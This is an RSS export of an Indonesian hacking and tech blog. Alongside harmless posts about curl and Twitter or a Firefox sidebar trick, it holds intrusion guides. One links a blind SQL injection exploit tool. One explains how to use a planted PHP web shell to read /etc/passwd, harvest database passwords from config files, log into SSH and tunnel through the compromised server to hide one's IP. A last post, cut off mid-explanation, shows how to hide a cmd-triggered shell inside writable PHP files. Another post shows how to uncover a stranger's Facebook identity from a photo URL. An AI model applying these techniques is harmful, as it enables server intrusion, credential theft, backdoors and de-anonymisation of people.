<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0' version='2.0'><channel><atom:id>tag:blogger.com,1999:blog-7362652417827057762</atom:id><lastBuildDate>Sun, 29 Apr 2012 21:08:28 +0000</lastBuildDate><category>console</category><category>terminal</category><category>Curl</category><category>update</category><category>twitter</category><category>Curhat</category><title>thund3r-x2 coret coret</title><description></description><link>http://www.thund3r-x2.co.cc/</link><managingEditor>noreply@blogger.com (thund3r_x2)</managingEditor><generator>Blogger</generator><openSearch:totalResults>9</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7362652417827057762.post-1269355513314239539</guid><pubDate>Mon, 01 Aug 2011 19:28:00 +0000</pubDate><atom:updated>2011-08-01T13:09:34.992-07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>update</category><category domain='http://www.blogger.com/atom/ns#'>twitter</category><category domain='http://www.blogger.com/atom/ns#'>terminal</category><category domain='http://www.blogger.com/atom/ns#'>Curl</category><category domain='http://www.blogger.com/atom/ns#'>console</category><title>Cara Baru update twitter via Terminal Linux</title><description>Pernah setahun lalu ada tutorial yang mengupdate twitter menggunakan curl. Kurang lebih caranya seperti ini..&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;$ curl -u username:password -d status="bla bla bla bla" http://twitter.com/statuses/update.xml&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Right??? yup tapi ternyata waktu saya coba cara itu sudah tidak bisa digunakan lagi. Akhirnya saya coba untuk mengakali dengan cara baru.. &lt;br /&gt;&lt;br /&gt;Ide ini datang saat salah satu aktris Indonesia Marshanda yang pada twitternya mengumumkan, mengadakan lomba tercepat men-tweet tentang launchingnya official site barunya. mulai dari jam 00:00. Nah dari lomba itu saya terfikir untuk membuat schedule agar machine saya bisa tweet about it at the right time. Tapi failed.. kenapa? ngga keburu.. saya tau lomba jam 9 malam.. sedang saya harus ngakalin tweet juga..&lt;br /&gt;&lt;br /&gt;Ok stop Curhat, coba ke materi.&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Twitter sekarang sudah mempunyai site versi mobile. Nah twitter versi mobile itu yang akan kita gunakan.&lt;br /&gt;&lt;br /&gt;pertama kita harus mengambil cookie dari hasil login kita. dengan cara&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;$ curl -b kue -c kue --data 'username=thund3r-x2' --data 'password=anypassword' https://mobile.twitter.com/session/&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Dari situ nanti akan ada file baru bernama 'kue' yang berisi cookie kita yang baru. &lt;br /&gt;file cookie ini akan kita gunakan untuk mengupdate status nantinya tapi ada satu variable lagi yang harus kita dapet.. nama variabel hidden yaitu authenticity_token. isi dari variable ini adalah kumpulan angka sebanyak 20 angka. Saya belum tahu bagaimana application mobile twitter mengenerate angka-angka ini. untuk mendapat kan token ini caranya&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;$ curl -b kue -c kue http://mobile.twitter.com | awk '/id=\"new_tweet/' | sed 's/[\"|&lt;|\/&gt;|div]//g' | cut -d"=" -f9&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;dari command itu akan dihasilkan token misal token yang didapat adalah 1e3a3b4c457781345123&lt;br /&gt;&lt;br /&gt;sebelaum ke command selanjutnya saya akan jelaskan per pipe :=&lt;br /&gt;&lt;br /&gt;- option -b/--cookie :: option ini menunjuk file yang berisi cookie yang akan POST ke server.&lt;br /&gt;&lt;br /&gt;- option -c/--cookie-jar :: option ini akan mengambil cookie yang ada dan menuliskannya ke file yang kita pass di depan option ini.&lt;br /&gt;&lt;br /&gt;- awk :: ini salah satu command linux untuk mengambil satu line yang di tandai oleh regex (regular expression) dimana pada command di atas saya mengambil satu line yang menggandung kata "id=new_tweet"&lt;br /&gt;&lt;br /&gt;- sed :: command linux juga yang pada command diatas digunakan untuk mereplace. pada command diatas itu saya coba untuk mengghapus tanda kutip (") atau tanda tag (&lt; || /&gt;) dan kata (div).&lt;br /&gt;&lt;br /&gt;- cut :: cut ini adalah untuk membagi sebuah line ke dalam beberapa colomn berdasarkna dilimiter option yang kita masukan. Dimana saya disini menggunakan dilimiter "=" untuk memisahkan tiap kata/kalimat dan menggunakan option -f untuk mengambil column yang ke sekian untuk mendapatkan result yang kita inginkan.&lt;br /&gt;&lt;br /&gt;Untuk lebih jelas command command linux tersebut bisa menggunakan Manual di linux sendiri.&lt;br /&gt;&lt;br /&gt;Dari token yang kita dapat tersebut kita akan POST ke twitter diikuti dengan update status kita. seperti ini&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;$ curl -b kue -c kue --data 'authenticity_token=1e3a3b4c457781345123' --data 'tweet[text]=coba update via curl' http://mobile.twitter.com&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;setelah command di eksekusi. Curl akan mengirim dua variable itu ke twitter dan langsung mengupdate status, berdasarkan apa yang kita masukan ke variabel tweet[text]&lt;br /&gt;&lt;br /&gt;silahkan check twitternya.&lt;br /&gt;ini hanya proof of concept. masih bisa dikembangkan lebih lanjut lagi misal kita feed twitter dengan cara yang sama dan teknik lainnya.. tergantung kebutuhan..&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7362652417827057762-1269355513314239539?l=www.thund3r-x2.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.thund3r-x2.co.cc/2011/08/cara-baru-update-twitter-via-terminal.html</link><author>noreply@blogger.com (thund3r_x2)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7362652417827057762.post-115134102513620073</guid><pubDate>Sun, 18 Apr 2010 04:59:00 +0000</pubDate><atom:updated>2010-04-17T22:21:17.158-07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Curhat</category><title>Dosen yang suka ngaku - ngaku</title><description>Lama tak pernah posting disini. Alasan simple dan dah umum. Soalnya sibuk.. hahah.. basi.. sekarang sesi curhat aja dulu.&lt;br /&gt;&lt;br /&gt;Pernah ada temen yang kuliah disalah satu sekolah tinggi di yogyakarta yang tanya tentang satu hal. katanya seperti ini "Mas, tau caranya buat biar bisa ada 3 sistem operasi di dalam 1 flash disk? tapi tiga tiganya bisa jalan dalam satu waktu... aku ada tugas dari dosen anu tentang ini.." aku rada bingung tentang masalah ini. klo 3 system operasi dalam 1 flash disk it's Ok itu bisa. tapi kalau harus jalankan 3 sistem operasi secara bersamaan itu serasa ga mungkin. trus aku kasih saran seperti ini. "kalau misal kita pake 1 system operasi lalu 2 sistem operasi lainnya menggunakan virtual gimana?" dia jawab "nggak mas dia bilang katanya pas power komputer itu nyala 3 system operasi itu bisa jalan barengan". Kaget gw disitu.. serasa ngga mungkin. walau ngga ada yang ngga mungkin tapi untuk seorang yang baru belajar komputer, tugas itu bener bener berat. ibaratnya gini orang ngetik aja baru kemaren sekarang harus dah bisa bikin OS sendiri. beuuh jenius banget klo langsung bisa.&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Nah suatu hari aku ada acara sama satu dosennya panggil aja Mr.X . akhirnya kita tanyakan tentang permasalahan itu. Ternyata eh ternyata. dosen yang kasih tugas ke mahasiswa tadi itu dapet soalnya dari Mr.X ini. tapi yang Mr.x kasih itu hanya bagaimana 3 system operasi bisa ada dalam satu flash disk. Ngga pake embel embel 3 system operasi jalan dalam satu waktu tanpa virtual. Nah base dari masalah memang dah ketemu tapi tetep jawaban soal masih bingung.&lt;br /&gt;&lt;br /&gt;Jadi kesimpulannya si Dosen yang kasih tugas ini berfikir terlalu jauh. dan terlalu menambah - nambah. padahal dia juga mungkin blom bisa dan blom pernah. Yang aku tau. dosen satu ini "songong" tau artinya "songong"? blagu. alias sok tau tapi blom tau. kadang suka ngaku ngaku bikin ini bikin itu padahal nol besar. cuma pengen keliatan keren aja di depan mahasiswa.&lt;br /&gt;&lt;br /&gt;Tapi sampe sekarang aku masih mikirin tuh maksud dosen apa. menjalankan 3 system operasi dalam satu waktu tanpa virtual. hmmm....&lt;br /&gt;&lt;br /&gt;buat Dosen klo baca ini.. mikir dulu ya sebelum kasih tugas.. belajar itu perlu tahapan. lagian klo blom pernah dapet jawabanya jangan dilempar ke mahasiswa yang baru kenal dengan dunia komputer. klo blom bisa bilang blom bisa. jangan ngga bisa bilang bisa. kecuali klo mang bilang bisa trus langsung dicari hasilnya. ini boro boro. bilang bisa tapi ngga dicari pemecahannya cuma nunggu dari mahasiswa yang berhasil dapetin jawabannya. Mahasiswa akan terus cari informasi dari orang yang tepat. dan mungkin itu bakal jatuh reputasi anda sebagai dosen. hahha..&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7362652417827057762-115134102513620073?l=www.thund3r-x2.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.thund3r-x2.co.cc/2010/04/dosen-yang-suka-ngaku-ngaku.html</link><author>noreply@blogger.com (thund3r_x2)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7362652417827057762.post-2675366226164469932</guid><pubDate>Thu, 14 Jan 2010 04:21:00 +0000</pubDate><atom:updated>2010-01-13T20:32:15.258-08:00</atom:updated><title>Dapetin ID Facebook dari foto yang di share</title><description>postingan ini cuma buat main main aja.. &lt;br /&gt;&lt;br /&gt;jadi gini.. kadangan kan ada yang share photo dari facebook cuma kasih link gambar aslinya..&lt;br /&gt;&lt;br /&gt;misal :&lt;br /&gt;&lt;br /&gt;http://photos-h.ak.fbcdn.net/hphotos-ak-snc3/hs213.snc3/22074_1145958823930_1676337142_295520_440760_n.jpg&lt;br /&gt;&lt;br /&gt;nah kita pengen tau facebook si pemilik foto siapa, ya klo bisa di add..&lt;br /&gt;caranya gampang.. liat nama gambarkan&lt;br /&gt;&lt;br /&gt;22074_1145958823930_1676337142_295520_440760_n.jpg&lt;br /&gt;&lt;br /&gt;nah kumpulan angka di belakang underscore ke dua itu idnya pemilik..&lt;br /&gt;di contoh idnya 1676337142&lt;br /&gt;jadi kita masukin aja id dia..&lt;br /&gt;&lt;br /&gt;http://facebook.com/profile.php?id=1676337142&lt;br /&gt;&lt;br /&gt;and taraaa.. berhasil.. tinggal add aja pemiliknya.. &lt;br /&gt;&lt;br /&gt;yang masih jadi penelitian ku sendiri angka angka lainnya yang ada di foto.. hmm..&lt;br /&gt;ya cuma iseng iseng... :D&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7362652417827057762-2675366226164469932?l=www.thund3r-x2.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.thund3r-x2.co.cc/2010/01/dapetin-id-facebook-dari-foto-yang-di.html</link><author>noreply@blogger.com (thund3r_x2)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7362652417827057762.post-9117781558352220627</guid><pubDate>Sun, 15 Nov 2009 07:13:00 +0000</pubDate><atom:updated>2009-11-14T23:58:17.081-08:00</atom:updated><title>Live Streaming On Sidebar Firefox</title><description>Pernah live streming di sidebar??&lt;br /&gt;hehe.. sebenernya idenya dari chat facebook di sidebar ya. cuma bedanya ini streaming. dan ide ini kepikiran pas aku lagi pengen nonton E-lifestyle tentang wimax sambil chat sama comment-comment di facebook. tapi ngga mau bolak balik buka tab browser. jadi gini...&lt;br /&gt;&lt;br /&gt;ok aku ambil streaming dari live metro tv aja ya..&lt;br /&gt;&lt;br /&gt;sekarang tinggal buka aja notepad trus copy paste code ini :&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);font-size:85%;"&gt;&amp;lt;object style="visibility: visible;" id="player" data="http://www.metrotvnews.com/us_player.swf" type="application/x-shockwave-flash" height="229" width="320"&amp;gt;&amp;lt;param value="scale=noscale&amp;amp;amp;wmode=transparent&amp;amp;amp;arrowScale=20" name="flashvars"&amp;gt;&amp;lt;/object&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;trus save pake extensi html. misal di save metro.html&lt;br /&gt;&lt;br /&gt;nah buka firefox nya trus pilih Boorkmarks &gt;&gt; Organize Bookmarks. misal di boorkmark toolbar. klik kanan di bookmark toolbar trus pilih new boorkmark. nah di jendela yang ada akan di suruh ngisi name location dll.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/__diGTlHBbJU/Sv-sB9U7BMI/AAAAAAAAAFg/S2CGg3GP3r8/s1600-h/a.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 223px;" src="http://4.bp.blogspot.com/__diGTlHBbJU/Sv-sB9U7BMI/AAAAAAAAAFg/S2CGg3GP3r8/s320/a.jpg" alt="" id="BLOGGER_PHOTO_ID_5404227227510047938" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;di name terserah isi apa aja. misal name metroTV. trus location pilih folder lokasi file metro.html gimana cara liat nya.. buka aja file metro.html pake firefox trus yang ada di box address di copy semua. misal&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;file:///C:/Documents%20and%20Settings/systemadmin/Desktop/metro.html&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;yang keyword ma description ngga usah di isi. trus centang Load this in sidebar. trus add. nah tinggal klik aja metro di boorkmark.&lt;br /&gt;&lt;br /&gt;ini cuma sebuah ide coy. setiap streaming codenya kan beda beda..&lt;br /&gt;&lt;br /&gt;nah dari mana code tadi.. gampang kok.. buka aja live streaming metro tv. dah gitu block dari dari tulisan home sampe bawah layar tv itu. trus klik kanan pilih yang view selection source. nah ntar bakal keliatan code itu. klo kita ngga block dulu source (langsung view source code) tadi malah ngga muncul code itu. hoho..&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/__diGTlHBbJU/Sv-wT0IrxWI/AAAAAAAAAFo/1Munr_Bvh8c/s1600-h/a.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 176px;" src="http://4.bp.blogspot.com/__diGTlHBbJU/Sv-wT0IrxWI/AAAAAAAAAFo/1Munr_Bvh8c/s320/a.jpg" alt="" id="BLOGGER_PHOTO_ID_5404231932326954338" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;klo dah kepepet ide bisa dateng dengan gampang kan.. :P ngga percaya?? tanya sama maling.. hahaha..&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/__diGTlHBbJU/Sv-xwmb7oHI/AAAAAAAAAFw/Lfxrr-ids68/s1600-h/a.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 146px;" src="http://3.bp.blogspot.com/__diGTlHBbJU/Sv-xwmb7oHI/AAAAAAAAAFw/Lfxrr-ids68/s320/a.jpg" alt="" id="BLOGGER_PHOTO_ID_5404233526377422962" border="0" /&gt;&lt;/a&gt;&lt;span style="font-size:78%;"&gt;(klik lebih jelas)&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7362652417827057762-9117781558352220627?l=www.thund3r-x2.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.thund3r-x2.co.cc/2009/11/live-streaming-on-sidebar-firefox.html</link><author>noreply@blogger.com (thund3r_x2)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/__diGTlHBbJU/Sv-sB9U7BMI/AAAAAAAAAFg/S2CGg3GP3r8/s72-c/a.jpg' height='72' width='72'/><thr:total>3</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7362652417827057762.post-4581776360004852309</guid><pubDate>Thu, 24 Sep 2009 10:48:00 +0000</pubDate><atom:updated>2009-09-24T06:26:19.261-07:00</atom:updated><title>Blind SQLi and Ximple Exploit</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/__diGTlHBbJU/Srtv-ccLMOI/AAAAAAAAAFE/GPmOJy6_mkA/s1600-h/1240341405_518053737_8a9794389e.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 169px; height: 132px;" src="http://2.bp.blogspot.com/__diGTlHBbJU/Srtv-ccLMOI/AAAAAAAAAFE/GPmOJy6_mkA/s320/1240341405_518053737_8a9794389e.jpg" alt="" id="BLOGGER_PHOTO_ID_5385020898028499170" border="0" /&gt;&lt;/a&gt;Video ini tentang sedikit Blind SQL injection yang lalu di lanjutkan dengan pembuatan tool dengan bahasa perl untuk menblind automatic target. Ingat tujuan dari Video ini bukan bagaimana kita menembus target. tapi bagaimana cara kita mempelajari teknik serangan dan membuat xploitnya.&lt;br /&gt;&lt;br /&gt;Exploit yang dibikin dalam Video ini sangat simple bin sederhana banget jadi untuk kemampuan yang lebih berarti harus ada pengembangan dari attacker sendiri untuk kebutuhannya.. dalam video ini kita hanya memasukan target bersama dengan variable vulnerable nya.. dan setelah itu xploit akan mencoba mengekstraknya satu persatu.&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;lebih jelasnya download disini&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.megaupload.com/?d=5OWGZ6Z7"&gt;[Megaupload]&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/283816443/thund3r_x2_blind_sqli.rar.html"&gt;[Rapidshare]&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;tutorial di Video ini simple banget.. moga bisa di pake belajar.. dan di kembangkan.. soalnya tujuannya emang itu, buat belajar.. :D&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:7pt;"&gt;*gambar diambil dari &lt;a href="http://hek.me"&gt;hek.me&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7362652417827057762-4581776360004852309?l=www.thund3r-x2.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.thund3r-x2.co.cc/2009/09/blind-sqli-and-ximple-exploit.html</link><author>noreply@blogger.com (thund3r_x2)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/__diGTlHBbJU/Srtv-ccLMOI/AAAAAAAAAFE/GPmOJy6_mkA/s72-c/1240341405_518053737_8a9794389e.jpg' height='72' width='72'/><thr:total>4</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7362652417827057762.post-7096768469621629844</guid><pubDate>Sat, 13 Jun 2009 21:20:00 +0000</pubDate><atom:updated>2009-09-24T03:28:55.361-07:00</atom:updated><title>SSH account and tunneling SSH</title><description>Disini dimisalkan kalian dah punya phpshell backdoor di site yang kalian attack, mungkin bisa dari hasil sql injection, rfi injection, bruteforce login atau apa lah. banyak cara buat dapet akses admin dari sebuah site. nah dari shell yang dah kita tanem bisa ngasilin ssh account yang dilanjut dipake buat hidding IP.&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;ok langsung pertama buka shell kalian. dari shell itu buka file passwd yang ada di folder etc. liat user mana saja yang punya akses SSH misal :&lt;br /&gt;klik gambar untuk lebih jelas..&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/__diGTlHBbJU/SjQay7KdpzI/AAAAAAAAADU/OvoOWDOMtoQ/s1600-h/SSH_1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 310px; height: 230px;" src="http://3.bp.blogspot.com/__diGTlHBbJU/SjQay7KdpzI/AAAAAAAAADU/OvoOWDOMtoQ/s320/SSH_1.jpg" alt="" id="BLOGGER_PHOTO_ID_5346928119772981042" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;dari situ user yang ternyata punya akses ssh adalah imcomming ok dari sini target user dah dapet.. sekarang masuk ke folder sitenya dia.. misal ada di /home2/imcomming/public_html/ lalu cari file yang sekiranya disana ada password yang akses ke database atau klo beruntung tertulis juga akses ke FTP. misal :&lt;br /&gt;klik gambar untuk lebih jelas..&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/__diGTlHBbJU/SjQdg1hJQ5I/AAAAAAAAADc/FrjolqKDEco/s1600-h/SSH_2.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 241px;" src="http://3.bp.blogspot.com/__diGTlHBbJU/SjQdg1hJQ5I/AAAAAAAAADc/FrjolqKDEco/s320/SSH_2.jpg" alt="" id="BLOGGER_PHOTO_ID_5346931107554739090" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;nah disana ada file yang namanya setting.php dan didalam situ ada password dan usernamenya. kalau di wordpress mungkin namanya wp-login.php di joomla configuration.php atau banyak cms lain yang pastinya file filenya mirip kayak gitu lah. klo ngga ada ya berarti harus bedah script login. biasanya di login itu ada include yang mengakses file password database. OK password dah dapet. kita tinggal coba login ke SSH, klo di windows pake putty. u can download &lt;a href="http://www.blogger.com/www.chiark.greenend.org.uk/%7Esgtatham/putty/download.html"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;buka putty lalu isi seperti kolom berikut.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/__diGTlHBbJU/SjQfSNhwM2I/AAAAAAAAADk/bv26Ed1SwEI/s1600-h/SSH_3.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 310px;" src="http://3.bp.blogspot.com/__diGTlHBbJU/SjQfSNhwM2I/AAAAAAAAADk/bv26Ed1SwEI/s320/SSH_3.jpg" alt="" id="BLOGGER_PHOTO_ID_5346933055324959586" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;nanti akan ada tampilan terminal bahwa kita sudah terkoneksi dan suruh kita masukan username yang di lanjut ngisi password. masukan usernamenya yang imcomming tadi lalu masukan password yang ada di file setting.php tadi. klo misal beruntung bakal langsung masuk..&lt;br /&gt;&lt;br /&gt;kalau di linux biasanya dah ada bawaannya kita tinggal buka terminal trus ketik : ssh username@servernya selanjutnya sama kayak di putty&lt;br /&gt;&lt;br /&gt;moga bisa ngerti maksudnya.. ^___^&lt;br /&gt;&lt;br /&gt;ok lanjut untuk tunneling yang nantinya dipake browsing.. buka putty (windows) dan ikuti langkah dibawah ini&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/__diGTlHBbJU/SjQhK8PeWkI/AAAAAAAAADs/bvUrgARgJsI/s1600-h/SSH_4.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 310px;" src="http://4.bp.blogspot.com/__diGTlHBbJU/SjQhK8PeWkI/AAAAAAAAADs/bvUrgARgJsI/s320/SSH_4.jpg" alt="" id="BLOGGER_PHOTO_ID_5346935129449060930" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/__diGTlHBbJU/SjQhySCHngI/AAAAAAAAAD0/WaQ7mVYs24k/s1600-h/SSH_5.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 310px;" src="http://3.bp.blogspot.com/__diGTlHBbJU/SjQhySCHngI/AAAAAAAAAD0/WaQ7mVYs24k/s320/SSH_5.jpg" alt="" id="BLOGGER_PHOTO_ID_5346935805313523202" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;setelah itu tinggal open. dan login lah..&lt;br /&gt;klo di linux lebih simple cukup dengan perintah # ssh -D "port" username@server "enter"&lt;br /&gt;&lt;br /&gt;nb : port dinamic yang di masukan terserah.&lt;br /&gt;&lt;br /&gt;setelah login ke sshnya kita buka firefox (browser fav gw) atau bisa buka browser fav kalian. setelah itu buka settingan proxy klo di mozilla (windows) :: tools &gt; option &gt; advance &gt; network &gt; setting, masukin setinggan kayak gini&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/__diGTlHBbJU/SjQit1DZljI/AAAAAAAAAD8/-gaIeMDhxBE/s1600-h/SSH_6.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 291px; height: 320px;" src="http://3.bp.blogspot.com/__diGTlHBbJU/SjQit1DZljI/AAAAAAAAAD8/-gaIeMDhxBE/s320/SSH_6.jpg" alt="" id="BLOGGER_PHOTO_ID_5346936828326417970" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;klo di mozilla (linux) :: edit &gt; preference &gt; advance &gt; network &gt; setting.&lt;br /&gt;setelah itu bukalah site untuk check IP. maka akan keliatan klo IP kita jadi IP server yang telah kita connectioning pake ssh.&lt;br /&gt;yang biasa aku pake untuk check IP site &gt;&gt; &lt;a href="http://www.ip-adress.com/"&gt;&lt;cite&gt;www.ip-adress.com&lt;/cite&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;by : thund3r-x2&lt;br /&gt;&lt;br /&gt;[www.thund3r-x2.co.cc]&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7362652417827057762-7096768469621629844?l=www.thund3r-x2.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.thund3r-x2.co.cc/2009/06/ssh-account-and-tunneling-ssh-disini.html</link><author>noreply@blogger.com (thund3r_x2)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/__diGTlHBbJU/SjQay7KdpzI/AAAAAAAAADU/OvoOWDOMtoQ/s72-c/SSH_1.jpg' height='72' width='72'/><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7362652417827057762.post-6760147050059512495</guid><pubDate>Fri, 22 May 2009 02:33:00 +0000</pubDate><atom:updated>2009-09-24T03:28:00.817-07:00</atom:updated><title>Hidden Shell and inject shell</title><description>Pernah denger kan kata itu. gw denger kata itu dari phpshell yang dibuat oleh Gblack. Private shell ver. 1.3. mungkin pernah ada yang coba. phpshell ini dibuat untuk hidden shell di file php yang memang sudah ada di server dan bisa ditulisi atau dengan permision &lt;span style="color: rgb(51, 102, 255);"&gt;777&lt;/span&gt;. kalau memang blom pernah coba.. download disini aja coba &lt;a href="http://www.credaincr.org/download.php?file=/home/cre10423/public_html/userfiles/b.php"&gt;[download].&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;mungkin ada yang penasaran.. kenapa setiap file yang di tambahin variable cmd=&lt;teserah&gt; di url itu keluar shell??&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;misal : hxxp://site.com/index.php?cmd=hacked&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;nah dengan pemanggilan seperti itu bisa keluar shell yang tersembunyi.&lt;br /&gt;bagi seorang programer PHP hal ini ngga akan sulit tapi untuk seorang yang bener bener awam dengan php. bahkan mungkin setiap kali menggunakan phpshell tidak pernah liat sebenernya apa sih isi source nya itu bisa sampe ngexekusi system. Biasanya para pengguna seperti ini disebut sebagai script kiddies. yang hanya mengunakan tool tanpa mengerti bagaimana tools itu berkerja.  ok masuk ke rahasia nya. jadi rahasianya ada di awal script itu. yaitu&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;if(!empty($_GET['cmd']){&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;&gt;&gt;&gt; shell &lt;&lt;&lt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;/blockquote&gt;nah dari tambahan script itu. jika kita suntikan di file php. setiap kali ada tambahan variable cmd di url dan variablenya ngga kosong. maka itu shell akan muncul. kalian bisa mencoba nya di localhost.&lt;br /&gt;&lt;br /&gt;tapi,, tetep ada tapinya. dengan kita menambah phpshell di file php otomatis size file php tersebut akan membengkak. agar tidak membengkak. maka kita gunakan fungsin yang sudah di sediakan oleh phpnya sendiri. yaitu fungsi &lt;span style="color: rgb(0, 153, 0);"&gt;file_get_contents()&lt;/span&gt;. dengan cara ini kita bisa mengambil isi file dari mana saja. 